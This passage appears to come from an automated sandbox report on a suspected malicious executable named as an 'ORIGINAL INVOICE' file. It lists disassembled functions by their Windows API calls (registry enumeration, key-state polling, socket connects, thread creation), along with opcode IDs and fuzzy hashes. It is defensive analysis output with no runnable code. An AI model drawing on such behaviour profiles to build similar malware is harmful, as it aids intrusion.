                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: b9b05d749fbf92127895aee004be41fcd90d14927fb19e737b52f1f554741e5d
                                                              • Instruction ID: 9cb11efcd09ca1e598bb61038af9dbab1360174da9c3225c9f7bc7dfbf78ea5a
                                                              • Opcode Fuzzy Hash: b9b05d749fbf92127895aee004be41fcd90d14927fb19e737b52f1f554741e5d
                                                              • Instruction Fuzzy Hash: 01514A75A1020ADFCB00EFA8D895DADF7B5BF58310B148055EA19AB352DB30ED55CF84
                                                              Function 00252E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00252EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00252F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00252F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00252FA1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00252FAE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: ea0f124e6430123bb42d7f7071610a849dd66cc15d7fe894620527956bc617a6
                                                              • Instruction ID: 8ce349033bd922fdd62275521d8043e2c00fef93db0abff5ac81e0d2f7d6d22d
                                                              • Opcode Fuzzy Hash: ea0f124e6430123bb42d7f7071610a849dd66cc15d7fe894620527956bc617a6
                                                              • Instruction Fuzzy Hash: E7516A71218208AFC704EF64D881E7AB7F9FF88304F04491DFA95972A1DB70E919CB92
                                                              Function 0025CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3819c1cd5aee258c26b113a3104175807b1a48a087431c61437c28d7f0f793dc
                                                              • Instruction ID: d68b6b9b68d36553c7d20b016f95d4adda76914c80a3d4cbdb433004d24a79a8
                                                              • Opcode Fuzzy Hash: 3819c1cd5aee258c26b113a3104175807b1a48a087431c61437c28d7f0f793dc
                                                              • Instruction Fuzzy Hash: BE411739921305AFC714DF28CC49FA9BB78EB09311F240225FD59E72D1E770AD65CA98
                                                              Function 00241206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002412B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002412DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0024131C
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00241341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00241349
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 775de487fbc17195f60715215803adfdf845afe1472f5da6b7999cbe193f17a8
                                                              • Instruction ID: 875c3076636697dd9bb9accfda6f2cc87c9ddc170bd8c2ea38d6f4a8d8c68250
                                                              • Opcode Fuzzy Hash: 775de487fbc17195f60715215803adfdf845afe1472f5da6b7999cbe193f17a8
                                                              • Instruction Fuzzy Hash: 88411C75A00109DFCB05EF64C985AAEBBF5FF18310B148095E90AAB3A2CB31ED51DF90
                                                              Function 0020B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                              • GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                              • GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: dadcc5f9c04ffa3ae0fdf0ae4bbeb6aaf4aaa6a0e35b271cad512e476847e14d
                                                              • Instruction ID: dc03bca3818c8ed489331c040001164cd2a6c04c8dedc76a6fdb6cefe6dc31dc
                                                              • Opcode Fuzzy Hash: dadcc5f9c04ffa3ae0fdf0ae4bbeb6aaf4aaa6a0e35b271cad512e476847e14d
                                                              • Instruction Fuzzy Hash: E5416235A1421ABBCF259F64C844AE9BBB8BF05324F104315F829A61D1CB71ADA4DF91
                                                              Function 0022B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0022B369
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 0022B413
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0022B41B
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 0022B429
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0022B431
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 7dca598fc415203cb8d1e719d2ba1ae55dfb951bf87a8419290e0ce1bf30e8f9
                                                              • Instruction ID: cfe34b6156d422f162d96760412c25565d011208c83596486e0f1cfb40d9d1d0
                                                              • Opcode Fuzzy Hash: 7dca598fc415203cb8d1e719d2ba1ae55dfb951bf87a8419290e0ce1bf30e8f9
                                                              • Instruction Fuzzy Hash: 5331C07191022AEBDF04CFA8ED4DA9E3BB5EF04325F104269F825A61D1C3B09964CB90
                                                              Function 0022DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0022DBD7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0022DBF4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0022DC2C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0022DC52
                                                              • _wcsstr.LIBCMT ref: 0022DC5C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: af29fd43f84ac356bbc6bfbfa897e580238da07642e671f08ac3766c8c17e203
                                                              • Instruction ID: dc2f52f46c5aae9cfe440713fa5d2af1f7ebe23f9d9edd3a013eb9de82dfb109
                                                              • Opcode Fuzzy Hash: af29fd43f84ac356bbc6bfbfa897e580238da07642e671f08ac3766c8c17e203
                                                              • Instruction Fuzzy Hash: 26214931224211BBEB255F78FC49E7B7BACDF45720F10403AF809DA081EAA1CC51D6A0
                                                              Function 0022BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0022BC90
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0022BCC2
                                                              • __itow.LIBCMT ref: 0022BCDA
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0022BD00
                                                              • __itow.LIBCMT ref: 0022BD11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: d902629475120bdcaa58e3b269c164e3dbebd9d7c2bd1ce2820a47349c2e5b5c
                                                              • Instruction ID: 20e62d9a154d3e61ec3f4a4ff900ec4d496fca34d9bd921260efaf362fed40e0
                                                              • Opcode Fuzzy Hash: d902629475120bdcaa58e3b269c164e3dbebd9d7c2bd1ce2820a47349c2e5b5c
                                                              • Instruction Fuzzy Hash: AE210835610628BFDB11AEA4AC4AFDF7BB9AF5A310F400025FA05EB181DB708D6587A1
                                                              Function 00236318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F50E6: _wcsncpy.LIBCMT ref: 001F50FA
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,002360C3), ref: 00236369
                                                              • GetLastError.KERNEL32(?,?,?,002360C3), ref: 00236374
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002360C3), ref: 00236388
                                                              • _wcsrchr.LIBCMT ref: 002363AA
                                                                • Part of subcall function 00236318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002360C3), ref: 002363E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                              • String ID:
                                                              • API String ID: 3633006590-0
                                                              • Opcode ID: e32fdf88792c3b1204b3f3577770e2d99b4a977e1194849cebb35bab85d38231
                                                              • Instruction ID: 6c77e9f27aeb1ffef5feb69aae78774560c779e7c5423442746cacb4cbcf7ec5
                                                              • Opcode Fuzzy Hash: e32fdf88792c3b1204b3f3577770e2d99b4a977e1194849cebb35bab85d38231
                                                              • Instruction Fuzzy Hash: 9F213871534306ABDB20AF74AC4AFEA23BCEF15B60F5080A5F409C70C1EBA0D9E18E54
                                                              Function 00248B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0024A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00248BD3
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248BE2
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00248BFE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 3701255441-0
                                                              • Opcode ID: 2a2d086e51ff8827cbf95801f1eb38e3518656cdb7d216c2e16cfd9045a97948
                                                              • Instruction ID: cd12876970d4ce51543b5e5fdd657c36a5c7ed4e5ae6ab2188738b0c8dff7dfb
                                                              • Opcode Fuzzy Hash: 2a2d086e51ff8827cbf95801f1eb38e3518656cdb7d216c2e16cfd9045a97948
                                                              • Instruction Fuzzy Hash: 8C21C3313202149FDB18AF28DC89F7D77A9EF54710F04444AF906AB2D2CBB0AC418B51
                                                              Function 00248420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00248441
                                                              • GetForegroundWindow.USER32 ref: 00248458
                                                              • GetDC.USER32(00000000), ref: 00248494
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 002484A0
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 002484DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: 9532765cca788954813fb60673544859ef7c5a103381f04d096cfebd0a37e313
                                                              • Instruction ID: 50297d496afb9de5b29fd19383a67243a06e3634ea6db7f446b230c54e4df478
                                                              • Opcode Fuzzy Hash: 9532765cca788954813fb60673544859ef7c5a103381f04d096cfebd0a37e313
                                                              • Instruction Fuzzy Hash: 42219675A10204AFD714EFA4DC49A6EB7F9EF48301F048479F95997251DB70AD44CB50
                                                              Function 0020AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                              • SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                              • BeginPath.GDI32(?), ref: 0020B009
                                                              • SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 41da142a56c9f7d54da5aeb3bb91dc1b9141e47aa712f9060577c67e6a66f30a
                                                              • Instruction ID: f11ffe5c1c76868e28b7784f894fcfb65520e495f52c26bdb330122650746ea2
                                                              • Opcode Fuzzy Hash: 41da142a56c9f7d54da5aeb3bb91dc1b9141e47aa712f9060577c67e6a66f30a
                                                              • Instruction Fuzzy Hash: A3219DB1820306AFDB219F55FC5C7AA7B7DBB10355F94432AE425A21E1D3B188B1CB90
                                                              Function 0021217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __calloc_crt.LIBCMT ref: 002121A9
                                                              • CreateThread.KERNEL32(?,?,002122DF,00000000,?,?), ref: 002121ED
                                                              • GetLastError.KERNEL32 ref: 002121F7
                                                              • _free.LIBCMT ref: 00212200
                                                              • __dosmaperr.LIBCMT ref: 0021220B
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 2664167353-0
                                                              • Opcode ID: 1a48d948d819cf10c72c4af43df06ff806022c6a8554440df879c5ca8171cade
                                                              • Instruction ID: cc7e1e467cd3e95519b17baad1a0fb8d8d7d44ec386597103455ffde9a82fdc1
                                                              • Opcode Fuzzy Hash: 1a48d948d819cf10c72c4af43df06ff806022c6a8554440df879c5ca8171cade
                                                              • Instruction Fuzzy Hash: CB11E532124306AF9B11AF649C45DDF3BE8EF657607100029FD1886142DB7188F18EA1
                                                              Function 0022ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                              • GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 212e7a5afa0572e71171ab0c0156f260f31ac5ccdf16e6deac3af91733cf16dd
                                                              • Instruction ID: 695d6280381014b640cbc5cc7ba33ed2232dca329bb4bc3f033b139bc03f60c6
                                                              • Opcode Fuzzy Hash: 212e7a5afa0572e71171ab0c0156f260f31ac5ccdf16e6deac3af91733cf16dd
                                                              • Instruction Fuzzy Hash: 9101F675210215BFDB144FA9EC48DAB3ABDEF8A755710042AF949D2260DA719C90CE61
                                                              Function 00237A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00237A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00237A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00237A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: bad77c7c00ee940c25502efcc4ee3337a683809b79dcb1b4734637f70fd720e4
                                                              • Instruction ID: 25530b96cbd5849a368959e9884c07c5c46e63a13262ad17a4f0a04becf1125c
                                                              • Opcode Fuzzy Hash: bad77c7c00ee940c25502efcc4ee3337a683809b79dcb1b4734637f70fd720e4
                                                              • Instruction Fuzzy Hash: CA0129B1C1461AEBDF10AFE4EC5CAEDBB78FF08711F400456E506B2250DB3096A4CBA5
                                                              Function 00229ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00229ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00229AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00229B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00229B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00229B21
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
